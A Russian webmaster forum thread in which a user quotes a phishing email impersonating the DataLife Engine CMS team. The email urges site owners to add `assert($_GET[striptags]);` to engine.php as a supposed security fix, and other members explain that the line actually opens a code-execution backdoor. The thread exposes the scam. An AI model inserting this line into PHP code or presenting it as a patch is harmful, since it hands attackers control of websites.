- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый вечер, вчера на почту пришло сообщение с одного из своих сайтов со следующим содержанием:
Уважаемые владельцы сайта site.ru!
Благодарим Вас за использование на Вашем сайте site.ru CMS «DataLife Engine».
Сообщаем Вам о том, что за последние сутки в код Вашего сайта site.ru был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.
Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.
При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.
Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.
Для исправления откройте файл: site.ru/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:
assert($_GET[striptags]);
С уважением,
Команда «DataLife Engine»
IP адрес отправителя: 141.255.162.162
Данная уязвимость была уже давно закрыта, а код который просят вставить наоборот открывает данную уязвимость! Будьте осторожны не делайте никаких исправлений в коде движка!
Это не новый вид взлома, такое уже было давно, только код немного другой:
Способ взлома DLE
То же самое пришло сегодня, с того же IP-адреса...
Обычный фишинг, ничего нового.
баянище........
Ещё один с 02.04.2010 не умеет пользоваться гуглом.
Ещё один с 02.04.2010 не умеет пользоваться гуглом.
за то вы умеете...нет бы ответить-помочь)
за то вы умеете...нет бы ответить-помочь)
что он и сделал - ответил и помог.
тоже самое пришло с IP 141.255.162.162